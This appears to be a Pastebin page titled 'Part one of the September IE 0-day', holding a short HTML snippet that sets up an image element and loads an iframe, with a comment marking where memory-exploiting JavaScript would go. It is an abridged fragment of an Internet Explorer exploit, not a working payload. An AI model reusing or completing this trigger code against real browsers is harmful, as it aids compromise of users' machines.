Advertisement
elreg_cw

Part one of the September IE 0-day

Sep 18th, 2012
135
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.22 KB | None | 0 0
  1. <body>
  2. <script>
  3. var arrr = new Array();
  4. arrr[0] = window.document.createElement("img");
  5. arrr[0]["src"] = "L";
  6. </script>
  7. <iframe src="child.html">
  8. <!-- javascript that exploits executable memory goes here -->
  9. </body>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement